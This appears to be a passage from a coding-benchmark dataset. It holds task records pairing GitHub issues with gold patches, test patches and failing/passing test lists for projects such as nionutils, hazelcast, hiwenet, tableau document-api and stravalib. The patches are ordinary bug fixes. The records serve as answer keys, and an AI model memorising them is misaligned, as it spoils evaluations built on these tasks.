+++ b/tests/test_main.py
@@ -198,6 +198,7 @@ def test_normal_flow(monkeypatch, tmp_path, runner):
index_page,
enable_js,
online_redirect_url,
+ playground_url,
icon,
icon_2x,
):
|
Add support for Docset Playgrounds
https://kapeli.com/docsets#docsetPlaygrounds
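With the patch above, passing `--playground-url` simply adds a `DashDocSetPlayURL` key to the generated Info.plist. A minimal sketch of that effect (plist keys taken from the patch; the URL is just an example value from the test patch):

```python
playground_url = "https://repl.it/F9J7/1"  # example value

plist_cfg = {
    "CFBundleIdentifier": "foo",
    "CFBundleName": "foo",
    "isDashDocset": True,
}
if playground_url is not None:
    plist_cfg["DashDocSetPlayURL"] = playground_url

assert plist_cfg["DashDocSetPlayURL"] == "https://repl.it/F9J7/1"
```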
|
0.0
|
e8a4f374588dfb054cb1d984c9c5e72821588528
|
[
"tests/test_docsets.py::TestPrepareDocset::test_plist_creation",
"tests/test_docsets.py::TestPrepareDocset::test_with_index_page",
"tests/test_docsets.py::TestPrepareDocset::test_with_javascript_enabled",
"tests/test_docsets.py::TestPrepareDocset::test_with_online_redirect_url",
"tests/test_docsets.py::TestPrepareDocset::test_with_playground_url",
"tests/test_docsets.py::TestPrepareDocset::test_with_icon",
"tests/test_docsets.py::TestPrepareDocset::test_with_icon_2x",
"tests/test_main.py::test_normal_flow"
] |
[
"tests/test_main.py::test_intersphinx",
"tests/test_main.py::TestArguments::test_fails_with_unknown_icon",
"tests/test_main.py::TestArguments::test_fails_with_missing_index_page",
"tests/test_main.py::TestArguments::test_handles_unknown_doc_types",
"tests/test_main.py::TestArguments::test_quiet_and_verbose_conflict",
"tests/test_main.py::TestArguments::test_fails_if_supplied_parser_fails",
"tests/test_main.py::TestSetupPaths::test_works",
"tests/test_main.py::TestSetupPaths::test_add_to_global_overrides_destination",
"tests/test_main.py::TestSetupPaths::test_detects_existing_dest"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-01-14 13:01:38+00:00
|
mit
| 2,770
|
|
nion-software__nionutils-19
|
diff --git a/nion/utils/Converter.py b/nion/utils/Converter.py
index 8bfacb2..178a127 100644
--- a/nion/utils/Converter.py
+++ b/nion/utils/Converter.py
@@ -43,7 +43,7 @@ class IntegerToStringConverter(ConverterLike[int, str]):
def convert_back(self, formatted_value: typing.Optional[str]) -> typing.Optional[int]:
""" Convert string to value using standard int conversion """
- formatted_value = re.sub("[^0-9]", "", formatted_value) if self.__fuzzy and formatted_value else None
+ formatted_value = re.sub("[+-](?!\d)|(?<=\.)\w*|[^-+0-9]", "", formatted_value) if self.__fuzzy and formatted_value else None
if formatted_value:
return int(formatted_value)
else:
|
nion-software/nionutils
|
c4b09457ab9433dde6f224279fe8f35265c6c041
|
diff --git a/nion/utils/test/Converter_test.py b/nion/utils/test/Converter_test.py
index 2fcbf1b..65b8717 100644
--- a/nion/utils/test/Converter_test.py
+++ b/nion/utils/test/Converter_test.py
@@ -23,6 +23,12 @@ class TestConverter(unittest.TestCase):
self.assertAlmostEqual(converter.convert_back(converter.convert(-100)) or 0.0, -100)
self.assertAlmostEqual(converter.convert_back(converter.convert(100)) or 0.0, 100)
+ def test_integer_to_string_converter(self) -> None:
+ converter = Converter.IntegerToStringConverter()
+ self.assertEqual(converter.convert_back("-1"), -1)
+ self.assertEqual(converter.convert_back("2.45653"), 2)
+ self.assertEqual(converter.convert_back("-adcv-2.15sa56aas"), -2)
+ self.assertEqual(converter.convert_back("xx4."), 4)
if __name__ == '__main__':
|
Regex in IntegerToStringConverter not handling negative numbers
https://github.com/nion-software/nionutils/blob/c4b09457ab9433dde6f224279fe8f35265c6c041/nion/utils/Converter.py#L46
This regex is not sufficient to properly handle negative numbers. It will also fail to convert floating point numbers. See the following examples:
```
from nion.utils import Converter
conv = Converter.IntegerToStringConverter()
conv.convert_back("-1")
>>> 1
conv.convert_back("1.243")
>>> 1243
```
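With the patched regular expression from the diff above, these inputs convert as intended. A quick standalone check of just the substitution step (illustrative; not the full converter class):

```python
import re

# Fuzzy clean-up pattern introduced by the patch above.
pattern = r"[+-](?!\d)|(?<=\.)\w*|[^-+0-9]"

def fuzzy_int(text: str) -> int:
    return int(re.sub(pattern, "", text))

assert fuzzy_int("-1") == -1
assert fuzzy_int("2.45653") == 2
assert fuzzy_int("-adcv-2.15sa56aas") == -2
assert fuzzy_int("xx4.") == 4
```

The expected values mirror the cases added in the test patch.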
|
0.0
|
c4b09457ab9433dde6f224279fe8f35265c6c041
|
[
"nion/utils/test/Converter_test.py::TestConverter::test_integer_to_string_converter"
] |
[
"nion/utils/test/Converter_test.py::TestConverter::test_float_to_scaled_integer_with_negative_min"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-05-13 12:15:05+00:00
|
apache-2.0
| 4,177
|
|
hazelcast__hazelcast-python-client-257
|
diff --git a/hazelcast/serialization/input.py b/hazelcast/serialization/input.py
index dcc68ca..cc6c387 100644
--- a/hazelcast/serialization/input.py
+++ b/hazelcast/serialization/input.py
@@ -36,7 +36,14 @@ class _ObjectDataInput(ObjectDataInput):
self._pos += _len
def skip_bytes(self, count):
- raise NotImplementedError("skip_bytes not implemented!!!")
+ if count <= 0:
+ return 0
+
+ if self._pos + count > self._size:
+ count = self._size - self._pos
+
+ self._pos += count
+ return count
def read_boolean(self, position=None):
return self.read_byte(position) != 0
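A rough standalone sketch of the clamping behaviour implemented above (mirroring `skip_bytes` with a plain position/size pair, not the actual class):

```python
def skip_bytes(pos: int, size: int, count: int):
    """Return (bytes_skipped, new_position), mirroring the logic above."""
    if count <= 0:
        return 0, pos
    if pos + count > size:
        count = size - pos
    return count, pos + count

assert skip_bytes(0, 10, 4) == (4, 4)    # normal skip
assert skip_bytes(8, 10, 4) == (2, 10)   # clamped to the remaining bytes
assert skip_bytes(0, 10, -1) == (0, 0)   # non-positive counts skip nothing
```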
|
hazelcast/hazelcast-python-client
|
766c61257c44094cd61efe057697fa45e8c64487
|
diff --git a/tests/serialization/input_test.py b/tests/serialization/input_test.py
index 71ae9a6..c17da70 100644
--- a/tests/serialization/input_test.py
+++ b/tests/serialization/input_test.py
@@ -51,6 +51,21 @@ class InputTestCase(unittest.TestCase):
self.assertEqual(0, initial_pos)
self.assertEqual(six.unichr(0x00e7), char)
+ def test_skip_bytes(self):
+ inp = _ObjectDataInput(bytearray(10))
+ self.assertEqual(0, inp.position())
+ self.assertEqual(4, inp.skip_bytes(4))
+ self.assertEqual(4, inp.position())
-if __name__ == '__main__':
- unittest.main()
+ def test_skip_bytes_when_count_greater_than_remaining(self):
+ inp = _ObjectDataInput(bytearray(10))
+ inp.set_position(8)
+ self.assertEqual(2, inp.skip_bytes(4))
+ self.assertEqual(10, inp.position())
+
+ def test_skip_bytes_when_count_is_not_positive(self):
+ inp = _ObjectDataInput(bytearray(10))
+ self.assertEqual(0, inp.skip_bytes(0))
+ self.assertEqual(0, inp.position())
+ self.assertEqual(0, inp.skip_bytes(-1))
+ self.assertEqual(0, inp.position())
|
Implement ObjectDataInput#skip_bytes
It seems that we haven't implemented the `skip_bytes` method yet. We should do that similarly to the Java client.
https://github.com/hazelcast/hazelcast/blob/master/hazelcast/src/main/java/com/hazelcast/internal/serialization/impl/ByteArrayObjectDataInput.java#L598
|
0.0
|
766c61257c44094cd61efe057697fa45e8c64487
|
[
"tests/serialization/input_test.py::InputTestCase::test_skip_bytes",
"tests/serialization/input_test.py::InputTestCase::test_skip_bytes_when_count_greater_than_remaining",
"tests/serialization/input_test.py::InputTestCase::test_skip_bytes_when_count_is_not_positive"
] |
[
"tests/serialization/input_test.py::InputTestCase::test_bool_array",
"tests/serialization/input_test.py::InputTestCase::test_char_be",
"tests/serialization/input_test.py::InputTestCase::test_char_le",
"tests/serialization/input_test.py::InputTestCase::test_int_array",
"tests/serialization/input_test.py::InputTestCase::test_short_array"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-12-02 09:48:01+00:00
|
apache-2.0
| 2,708
|
|
raamana__hiwenet-12
|
diff --git a/hiwenet/__init__.py b/hiwenet/__init__.py
index 07c8a69..98bbb16 100644
--- a/hiwenet/__init__.py
+++ b/hiwenet/__init__.py
@@ -4,16 +4,19 @@
"""
+__all__ = ['extract', 'pairwise_dist', 'run_cli', 'more_metrics']
+
from sys import version_info
if version_info.major==2 and version_info.minor==7:
- from hiwenet import extract, run_cli
+ import more_metrics
+ from pairwise_dist import extract, run_cli
elif version_info.major > 2:
- from hiwenet.hiwenet import extract, run_cli
+ from hiwenet import more_metrics
+ from hiwenet.pairwise_dist import extract, run_cli
else:
- raise NotImplementedError('hiwenet supports only 2.7.13 or 3+. Upgrade to Python 3+ is recommended.')
+ raise NotImplementedError('hiwenet supports only 2.7 or 3+. Upgrade to Python 3+ is recommended.')
-__all__ = ['extract', 'hiwenet', 'run_cli']
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
diff --git a/hiwenet/__main__.py b/hiwenet/__main__.py
index a764b5b..01b6612 100644
--- a/hiwenet/__main__.py
+++ b/hiwenet/__main__.py
@@ -1,9 +1,9 @@
from sys import version_info
if version_info.major==2 and version_info.minor==7:
- from hiwenet import run_cli
+ from pairwise_dist import run_cli
elif version_info.major > 2:
- from hiwenet.hiwenet import run_cli
+ from hiwenet.pairwise_dist import run_cli
else:
raise NotImplementedError('hiwenet supports only 2.7.13 or 3+. Upgrade to Python 3+ is recommended.')
diff --git a/hiwenet/more_metrics.py b/hiwenet/more_metrics.py
new file mode 100644
index 0000000..4826d5d
--- /dev/null
+++ b/hiwenet/more_metrics.py
@@ -0,0 +1,76 @@
+"""
+Module implementing additional metrics for edge weights.
+
+"""
+
+__all__ = ['diff_medians', 'diff_medians_abs']
+
+import numpy as np
+
+def check_array(array):
+ "Converts to flattened numpy arrays and ensures its not empty."
+
+ if len(array) < 1:
+ raise ValueError('Input array is empty! Must have atleast 1 element.')
+
+ return np.array(array).flatten()
+
+
+def diff_medians(array_one, array_two):
+ """
+ Computes the difference medians between two arrays of values.
+
+ Given arrays will be flattened (to 1D array) regardless of dimension,
+ and any bon-finite/NaN values will be ignored.
+
+ Parameters
+ ----------
+ array_one, array_two : iterable
+ Two arrays of values, possibly of different length.
+
+ Returns
+ -------
+ diff_medians : float
+ scalar measuring the difference in medians, ignoring NaNs/non-finite values.
+
+ Raises
+ ------
+ ValueError
+ If one or more of the arrays are empty.
+
+ """
+
+ array_one = check_array(array_one)
+ array_two = check_array(array_two)
+ diff_medians = np.median(array_one) - np.median(array_two)
+
+ return diff_medians
+
+
+def diff_medians_abs(array_one, array_two):
+ """
+ Computes the absolute difference (symmetric) medians between two arrays of values.
+
+ Given arrays will be flattened (to 1D array) regardless of dimension,
+ and any bon-finite/NaN values will be ignored.
+
+ Parameters
+ ----------
+ array_one, array_two : iterable
+ Two arrays of values, possibly of different length.
+
+ Returns
+ -------
+ diff_medians : float
+ scalar measuring the difference in medians, ignoring NaNs/non-finite values.
+
+ Raises
+ ------
+ ValueError
+ If one or more of the arrays are empty.
+
+ """
+
+ abs_diff_medians = np.abs(diff_medians(array_one, array_two))
+
+ return abs_diff_medians
\ No newline at end of file
diff --git a/hiwenet/hiwenet.py b/hiwenet/pairwise_dist.py
similarity index 96%
rename from hiwenet/hiwenet.py
rename to hiwenet/pairwise_dist.py
index 39b2518..67aa786 100644
--- a/hiwenet/hiwenet.py
+++ b/hiwenet/pairwise_dist.py
@@ -10,6 +10,14 @@ import logging
import networkx as nx
import numpy as np
from os.path import join as pjoin, exists as pexists
+from sys import version_info
+
+if version_info.major==2 and version_info.minor==7:
+ import more_metrics
+elif version_info.major > 2:
+ from hiwenet import more_metrics
+else:
+ raise NotImplementedError('hiwenet supports only 2.7 or 3+. Upgrade to Python 3+ is recommended.')
list_medpy_histogram_metrics = np.array([
'chebyshev', 'chebyshev_neg', 'chi_square',
@@ -37,7 +45,7 @@ semi_metric_list = [
'noelle_1', 'noelle_3',
'correlate_1']
-metrics_on_original_features = ['diff_medians', ]
+metrics_on_original_features = ['diff_medians', 'diff_medians_abs']
minimum_num_bins = 5
@@ -318,6 +326,8 @@ def extract(features, groups,
print('All exceptions encountered so far:\n {}'.format('\n'.join(exceptions_list)))
raise ValueError('Weights for atleast {:.2f}% of edges could not be computed.'.format(error_thresh * 100))
+ sys.stdout.write('\n')
+
if return_networkx_graph:
if out_weights_path is not None:
graph.write_graphml(out_weights_path)
@@ -492,16 +502,23 @@ def check_weight_method(weight_method_spec,
raise TypeError('allow_non_symmetric flag must be boolean')
if isinstance(weight_method_spec, str):
+ weight_method_spec = weight_method_spec.lower()
+
if weight_method_spec in list_medpy_histogram_metrics:
from medpy.metric import histogram as medpy_hist_metrics
weight_func = getattr(medpy_hist_metrics, weight_method_spec)
+ if use_orig_distr:
+ raise ValueError('use_original_distribution must be False when using builtin histogram metrics, '
+ 'which expect histograms as input.')
+
+ elif weight_method_spec in metrics_on_original_features:
+ weight_func = getattr(more_metrics, weight_method_spec)
+ if not use_orig_distr:
+ raise ValueError('use_original_distribution must be True when using builtin non-histogram metrics, '
+ 'which expect original feature values in ROI/node as input.')
else:
raise NotImplementedError('Chosen histogram distance/metric not implemented or invalid.')
- if use_orig_distr:
- raise ValueError('use_original_distribution must be False when using builtin histogram metrics, '
- 'which expect histograms as input.')
-
elif callable(weight_method_spec):
# ensure 1) takes two ndarrays
try:
|
raamana/hiwenet
|
7cf61bb7d3531408ef9c77fd81e1d15122e1bfa3
|
diff --git a/hiwenet/test_hiwenet.py b/hiwenet/test_hiwenet.py
index e1df71e..afa4ea6 100644
--- a/hiwenet/test_hiwenet.py
+++ b/hiwenet/test_hiwenet.py
@@ -9,8 +9,8 @@ from os.path import join as pjoin, exists as pexists, abspath
from sys import version_info
if version_info.major==2 and version_info.minor==7:
- from hiwenet import extract as hiwenet
- from hiwenet import run_cli as CLI
+ from pairwise_dist import extract as hiwenet
+ from pairwise_dist import run_cli as CLI
elif version_info.major > 2:
from hiwenet import extract as hiwenet
from hiwenet import run_cli as CLI
@@ -72,6 +72,25 @@ def test_dimensions():
assert len(ew) == num_groups
assert ew.shape[0] == num_groups and ew.shape[1] == num_groups
+def test_more_metrics():
+ ew = hiwenet(features, groups, weight_method='diff_medians',
+ use_original_distribution=True)
+ assert len(ew) == num_groups
+ assert ew.shape[0] == num_groups and ew.shape[1] == num_groups
+
+ ew_abs = hiwenet(features, groups, weight_method='diff_medians_abs',
+ use_original_distribution=True)
+ assert np.allclose(np.abs(ew), ew_abs, equal_nan=True)
+
+ with raises(ValueError):
+ ew = hiwenet(features, groups, weight_method='diff_medians',
+ use_original_distribution=False)
+
+ with raises(ValueError):
+ ew = hiwenet(features, groups,
+ weight_method='manhattan',
+ use_original_distribution=True)
+
def test_too_few_groups():
features, groups, group_ids, num_groups = make_features(100, 1)
with raises(ValueError):
@@ -256,6 +275,8 @@ def test_input_callable_on_orig_data():
use_original_distribution=True)
# test_directed_nx()
-test_directed_mat()
+# test_directed_mat()
# test_CLI_output_matches_API()
-# test_input_callable()
\ No newline at end of file
+# test_input_callable()
+
+test_more_metrics()
\ No newline at end of file
|
Broadening options for weight computation
Using the new support for an arbitrary callable as the weight method, implement more useful weights (see the sketch after this list):
- [ ] difference in medians,
- [ ] correlation, thresholding, etc.
- [ ] others of interest
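As a sketch of the first item, a difference-of-medians weight can be written as a plain callable over the raw feature values (pure numpy, independent of hiwenet itself; the function names here are just illustrative):
```python
import numpy as np

def diff_medians(array_one, array_two):
    """Difference of medians between two arrays of raw feature values."""
    array_one = np.asarray(array_one).flatten()
    array_two = np.asarray(array_two).flatten()
    if array_one.size < 1 or array_two.size < 1:
        raise ValueError('Input arrays must each have at least 1 element.')
    return np.median(array_one) - np.median(array_two)

def diff_medians_abs(array_one, array_two):
    """Symmetric (absolute) variant of the same weight."""
    return abs(diff_medians(array_one, array_two))

print(diff_medians([1, 2, 3], [10, 20, 30]))  # -> -18.0
```
Such a callable could then be passed to `extract` via `weight_method`, together with `use_original_distribution=True`, so that it receives the raw feature values of each group rather than their histograms.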
|
0.0
|
7cf61bb7d3531408ef9c77fd81e1d15122e1bfa3
|
[
"hiwenet/test_hiwenet.py::test_more_metrics",
"hiwenet/test_hiwenet.py::test_too_few_groups",
"hiwenet/test_hiwenet.py::test_too_few_values",
"hiwenet/test_hiwenet.py::test_invalid_trim_perc",
"hiwenet/test_hiwenet.py::test_invalid_weight_method",
"hiwenet/test_hiwenet.py::test_trim_not_too_few_values",
"hiwenet/test_hiwenet.py::test_trim_false_too_few_to_calc_range",
"hiwenet/test_hiwenet.py::test_not_np_arrays",
"hiwenet/test_hiwenet.py::test_CLI_nonexisting_paths",
"hiwenet/test_hiwenet.py::test_CLI_invalid_args",
"hiwenet/test_hiwenet.py::test_CLI_too_few_args",
"hiwenet/test_hiwenet.py::test_input_callable_on_orig_data"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-11-12 04:44:48+00:00
|
mit
| 5,148
|
|
tableau__document-api-python-15
|
diff --git a/tableaudocumentapi/datasource.py b/tableaudocumentapi/datasource.py
index 93ebe55..617004a 100644
--- a/tableaudocumentapi/datasource.py
+++ b/tableaudocumentapi/datasource.py
@@ -72,7 +72,7 @@ class Datasource(object):
"""
# save the file
- self._datasourceTree.write(self._filename)
+ self._datasourceTree.write(self._filename, encoding="utf-8", xml_declaration=True)
def save_as(self, new_filename):
"""
@@ -85,7 +85,7 @@ class Datasource(object):
Nothing.
"""
- self._datasourceTree.write(new_filename)
+ self._datasourceTree.write(new_filename, encoding="utf-8", xml_declaration=True)
###########
# name
diff --git a/tableaudocumentapi/workbook.py b/tableaudocumentapi/workbook.py
index 67dbc32..889f746 100644
--- a/tableaudocumentapi/workbook.py
+++ b/tableaudocumentapi/workbook.py
@@ -76,7 +76,7 @@ class Workbook(object):
"""
# save the file
- self._workbookTree.write(self._filename)
+ self._workbookTree.write(self._filename, encoding="utf-8", xml_declaration=True)
def save_as(self, new_filename):
"""
@@ -90,7 +90,7 @@ class Workbook(object):
"""
- self._workbookTree.write(new_filename)
+ self._workbookTree.write(new_filename, encoding="utf-8", xml_declaration=True)
###########################################################################
#
|
tableau/document-api-python
|
07aad9550d3d36a4d74c4751832c50fe81882a01
|
diff --git a/test.py b/test.py
index fd7d1bd..5606005 100644
--- a/test.py
+++ b/test.py
@@ -17,6 +17,7 @@ TABLEAU_10_WORKBOOK = '''<?xml version='1.0' encoding='utf-8' ?><workbook source
TABLEAU_CONNECTION_XML = ET.fromstring(
'''<connection authentication='sspi' class='sqlserver' dbname='TestV1' odbc-native-protocol='yes' one-time-sql='' server='mssql2012.test.tsi.lan' username=''></connection>''')
+
class HelperMethodTests(unittest.TestCase):
def test_is_valid_file_with_valid_inputs(self):
@@ -39,7 +40,6 @@ class ConnectionParserTests(unittest.TestCase):
self.assertIsInstance(connections[0], Connection)
self.assertEqual(connections[0].dbname, 'TestV1')
-
def test_can_extract_federated_connections(self):
parser = ConnectionParser(ET.fromstring(TABLEAU_10_TDS), '10.0')
connections = parser.get_connections()
@@ -97,6 +97,17 @@ class DatasourceModelTests(unittest.TestCase):
new_tds = Datasource.from_file(self.tds_file.name)
self.assertEqual(new_tds.connections[0].dbname, 'newdb.test.tsi.lan')
+ def test_save_has_xml_declaration(self):
+ original_tds = Datasource.from_file(self.tds_file.name)
+ original_tds.connections[0].dbname = 'newdb.test.tsi.lan'
+
+ original_tds.save()
+
+ with open(self.tds_file.name) as f:
+ first_line = f.readline().strip() # first line should be xml tag
+ self.assertEqual(
+ first_line, "<?xml version='1.0' encoding='utf-8'?>")
+
class WorkbookModelTests(unittest.TestCase):
@@ -122,7 +133,8 @@ class WorkbookModelTests(unittest.TestCase):
original_wb.save()
new_wb = Workbook(self.workbook_file.name)
- self.assertEqual(new_wb.datasources[0].connections[0].dbname, 'newdb.test.tsi.lan')
+ self.assertEqual(new_wb.datasources[0].connections[
+ 0].dbname, 'newdb.test.tsi.lan')
class WorkbookModelV10Tests(unittest.TestCase):
@@ -152,7 +164,19 @@ class WorkbookModelV10Tests(unittest.TestCase):
original_wb.save()
new_wb = Workbook(self.workbook_file.name)
- self.assertEqual(new_wb.datasources[0].connections[0].dbname, 'newdb.test.tsi.lan')
+ self.assertEqual(new_wb.datasources[0].connections[
+ 0].dbname, 'newdb.test.tsi.lan')
+
+ def test_save_has_xml_declaration(self):
+ original_wb = Workbook(self.workbook_file.name)
+ original_wb.datasources[0].connections[0].dbname = 'newdb.test.tsi.lan'
+
+ original_wb.save()
+
+ with open(self.workbook_file.name) as f:
+ first_line = f.readline().strip() # first line should be xml tag
+ self.assertEqual(
+ first_line, "<?xml version='1.0' encoding='utf-8'?>")
if __name__ == '__main__':
unittest.main()
|
Tabcmd publish with .twb created via Document API
I can successfully create a .twb file via the Document API, but attempting to publish it to my Tableau Server via Tabcmd results in an unexpected error:
**Bad request
unexpected error occurred opening the packaged workbook.**
Attached is the template workbook created in Tableau Desktop (superstore_sales.twb) and one of the workbooks created from that template via the Document API (superstore_sales_arizona.twb)
[superstore_twbs.zip](https://github.com/tableau/document-api-python/files/285303/superstore_twbs.zip)
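For illustration (this reproduction is mine, not taken from the attached workbooks): `ElementTree.write()` omits the XML declaration by default, which appears to be what the programmatically saved workbook is missing compared to one saved by Tableau Desktop:
```python
import io
import xml.etree.ElementTree as ET

tree = ET.ElementTree(ET.Element("workbook"))

# Default write: no <?xml ...?> header.
default_out = io.BytesIO()
tree.write(default_out)
print(default_out.getvalue())  # b'<workbook />'

# Forcing the declaration restores the header Tableau Desktop writes.
declared_out = io.BytesIO()
tree.write(declared_out, encoding="utf-8", xml_declaration=True)
print(declared_out.getvalue())
# b"<?xml version='1.0' encoding='utf-8'?>\n<workbook />"
```
Saving with `encoding="utf-8"` and `xml_declaration=True` would therefore be one way to make the Document API output match what Tableau Server expects.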
|
0.0
|
07aad9550d3d36a4d74c4751832c50fe81882a01
|
[
"test.py::DatasourceModelTests::test_save_has_xml_declaration",
"test.py::WorkbookModelV10Tests::test_save_has_xml_declaration"
] |
[
"test.py::HelperMethodTests::test_is_valid_file_with_invalid_inputs",
"test.py::HelperMethodTests::test_is_valid_file_with_valid_inputs",
"test.py::ConnectionParserTests::test_can_extract_federated_connections",
"test.py::ConnectionParserTests::test_can_extract_legacy_connection",
"test.py::ConnectionModelTests::test_can_read_attributes_from_connection",
"test.py::ConnectionModelTests::test_can_write_attributes_to_connection",
"test.py::DatasourceModelTests::test_can_extract_connection",
"test.py::DatasourceModelTests::test_can_extract_datasource_from_file",
"test.py::DatasourceModelTests::test_can_save_tds",
"test.py::WorkbookModelTests::test_can_extract_datasource",
"test.py::WorkbookModelTests::test_can_update_datasource_connection_and_save",
"test.py::WorkbookModelV10Tests::test_can_extract_datasourceV10",
"test.py::WorkbookModelV10Tests::test_can_update_datasource_connection_and_saveV10"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-06-02 00:21:16+00:00
|
mit
| 5,823
|
|
stravalib__stravalib-454
|
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index c1e950f..26e03a2 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -25,7 +25,7 @@ default_stages: [commit]
repos:
# Misc commit checks
- repo: https://github.com/pre-commit/pre-commit-hooks
- rev: v4.4.0
+ rev: v4.5.0
# ref: https://github.com/pre-commit/pre-commit-hooks#hooks-available
hooks:
# Autoformat: Makes sure files end in a newline and only a newline.
@@ -37,14 +37,14 @@ repos:
# Linting code using ruff
- repo: https://github.com/astral-sh/ruff-pre-commit
- rev: v0.0.292
+ rev: v0.1.9
hooks:
- id: ruff
args: [--fix, --exit-non-zero-on-fix]
# Black for auto code formatting
- repo: https://github.com/psf/black
- rev: 23.9.1
+ rev: 23.12.1
hooks:
- id: black
entry: bash -c 'black "$@"; git add -u' --
diff --git a/changelog.md b/changelog.md
index d127d7c..8cfcf9e 100644
--- a/changelog.md
+++ b/changelog.md
@@ -2,12 +2,13 @@
## Unreleased
-- Fix: forgot to update model CI build to follow new src layout (@lwasser, #438)
+- Fix: Forgot to update model CI build to follow new src layout (@lwasser, #438)
- Fix: Type annotation on field that are of type timedelta are now correct (@enadeau, #440)
- Fix: Correct type for ActivityPhoto sizes attribute (@jsamoocha, #444)
- Fix: codespell config - ignore resources dir in tests (@lwasser, #445)
- Add: Support for Strava's new read rate limits (@jsamoocha, #446)
-- Fix: ignore documentation autogenerated api stubs (@lwasser, #447)
+- Fix: Ignore documentation autogenerated api stubs (@lwasser, #447)
+- Add: Improved handling of unexpected activity types (@jsamoocha, #454)
### Breaking Changes
diff --git a/src/stravalib/model.py b/src/stravalib/model.py
index 49d9e09..5879ae1 100644
--- a/src/stravalib/model.py
+++ b/src/stravalib/model.py
@@ -348,6 +348,30 @@ class BoundClientEntity(BaseModel):
bound_client: Optional[Any] = Field(None, exclude=True)
+class RelaxedActivityType(ActivityType):
+ @root_validator(pre=True)
+ def check_activity_type(cls, values: dict[str, Any]) -> dict[str, Any]:
+ v = values["__root__"]
+ if v not in get_args(ActivityType.__fields__["__root__"].type_):
+ LOGGER.warning(
+ f'Unexpected activity type. Given={v}, replacing by "Workout"'
+ )
+ values["__root__"] = "Workout"
+ return values
+
+
+class RelaxedSportType(SportType):
+ @root_validator(pre=True)
+ def check_sport_type(cls, values: dict[str, Any]) -> dict[str, Any]:
+ v = values["__root__"]
+ if v not in get_args(SportType.__fields__["__root__"].type_):
+ LOGGER.warning(
+ f'Unexpected sport type. Given={v}, replacing by "Workout"'
+ )
+ values["__root__"] = "Workout"
+ return values
+
+
class LatLon(LatLng, BackwardCompatibilityMixin, DeprecatedSerializableMixin):
"""
Enables backward compatibility for legacy namedtuple
@@ -935,7 +959,7 @@ class Segment(
map: Optional[Map] = None
athlete_segment_stats: Optional[AthleteSegmentStats] = None
athlete_pr_effort: Optional[AthletePrEffort] = None
- activity_type: Optional[ActivityType] = None # type: ignore[assignment]
+ activity_type: Optional[RelaxedActivityType] = None # type: ignore[assignment]
# Undocumented attributes:
start_latitude: Optional[float] = None
@@ -952,6 +976,7 @@ class Segment(
"elevation_high": uh.meters,
"elevation_low": uh.meters,
"total_elevation_gain": uh.meters,
+ "activity_type": enum_value,
}
_latlng_check = validator(
@@ -1040,6 +1065,8 @@ class Activity(
end_latlng: Optional[LatLon] = None
map: Optional[Map] = None
gear: Optional[Gear] = None
+ type: Optional[RelaxedActivityType] = None
+ sport_type: Optional[RelaxedSportType] = None
# Ignoring types here given there are overrides
best_efforts: Optional[list[BestEffort]] = None # type: ignore[assignment]
segment_efforts: Optional[list[SegmentEffort]] = None # type: ignore[assignment]
|
stravalib/stravalib
|
c6f8ad52994bc3e9f202a669087b82f560b5ed5a
|
diff --git a/src/stravalib/tests/unit/test_model.py b/src/stravalib/tests/unit/test_model.py
index b9c6074..ec01344 100644
--- a/src/stravalib/tests/unit/test_model.py
+++ b/src/stravalib/tests/unit/test_model.py
@@ -225,6 +225,23 @@ def test_backward_compatible_attribute_lookup(
assert not hasattr(lookup_expression, "bound_client")
+@pytest.mark.parametrize(
+ "klass,attr,given_type,expected_type",
+ (
+ (Activity, "type", "Run", "Run"),
+ (Activity, "sport_type", "Run", "Run"),
+ (Activity, "type", "FooBar", "Workout"),
+ (Activity, "sport_type", "FooBar", "Workout"),
+ (Segment, "activity_type", "Run", "Run"),
+ (Segment, "activity_type", "FooBar", "Workout"),
+ ),
+)
+def test_relaxed_activity_type_validation(
+ klass, attr, given_type, expected_type
+):
+ assert getattr(klass(**{attr: given_type}), attr) == expected_type
+
+
class ModelTest(TestBase):
def setUp(self):
super(ModelTest, self).setUp()
|
ENH: Graceful handling of Pydantic validation errors (for unexpected sports type / activity type)
### Feature Type
- [ ] Adding new functionality to stravalib
- [X] Changing existing functionality in stravalib
- [ ] Removing existing functionality in stravalib
### Problem Description
For unexpected activity/sport types, parsing `Activity` objects crashes with a Pydantic `ValidationError`. On (rare) occasions, these unexpected (and undocumented) types pop up in responses from Strava.
### Feature Description
We can add custom types and validators for (at least) the mentioned fields `activity_type` and `sport_type`. For unexpected types, we can then parse them and log a warning instead of crashing.
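A minimal sketch of that idea, assuming pydantic v1-style validators (the model and the abbreviated list of known types below are illustrative, not stravalib's actual classes):
```python
import logging
from pydantic import BaseModel, validator

LOGGER = logging.getLogger(__name__)
KNOWN_TYPES = ("Run", "Ride", "Swim", "Workout")  # abbreviated for the example

class Activity(BaseModel):
    type: str

    @validator("type", pre=True)
    def relax_unknown_type(cls, v):
        # Fall back to "Workout" and warn instead of raising a ValidationError.
        if v not in KNOWN_TYPES:
            LOGGER.warning('Unexpected activity type %s, replacing by "Workout"', v)
            return "Workout"
        return v

print(Activity(type="Run").type)     # -> Run
print(Activity(type="FooBar").type)  # -> Workout (plus a logged warning)
```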
### Alternative Solutions
Unfeasible: requesting Strava to always keep the documentation 100% up-to-date.
### Additional Context
_No response_
### Code of Conduct
- [X] I agree to follow this project's Code of Conduct
|
0.0
|
c6f8ad52994bc3e9f202a669087b82f560b5ed5a
|
[
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-type-FooBar-Workout]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-sport_type-FooBar-Workout]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Segment-activity_type-Run-Run]",
